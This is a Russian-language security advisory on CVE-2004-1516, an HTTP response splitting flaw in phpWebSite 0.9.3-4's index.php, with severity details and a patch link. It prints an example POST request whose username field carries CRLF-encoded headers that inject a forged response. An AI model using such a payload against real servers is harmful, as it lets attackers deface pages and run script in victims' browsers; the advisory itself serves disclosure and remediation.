Response Splitting атака в phpWebSite

Дата публикации:	15.11.2004
Всего просмотров:	1595
Опасность:	Низкая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	CVE-2004-1516
Вектор эксплуатации:	Удаленная
Воздействие:	Межсайтовый скриптинг
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	phpWebSite 0.x
	Уязвимые версии: phpWebSite0.9.3-4 Описание: Уязвимость обнаружена в phpWebSite. Удаленный атакующий может произвести Response Splitting атаку. Уязвимость существует в фале index.php из-за некорректной фильтрации входных данных. Удаленный атакующий может с помощью специально сформированного HTTP POST запроса подменить содержимое страниц web сервера, выполнить произвольный HTML код в браузере жертвы. Пример: POST /index.php HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-length: 218 Connection: Keep-Alive module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aConte nt-Type:% site in 0wned</html>&password=foobar URL производителя: phpwebsite.appstate.edu Решение: Установите обновление http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
Ссылки:	phpWebSite Input Validation Flaws Let Remote Users Conduct HTTP Response Splitting Attacks

Response Splitting атака в phpWebSite

Подпишитесь на email рассылку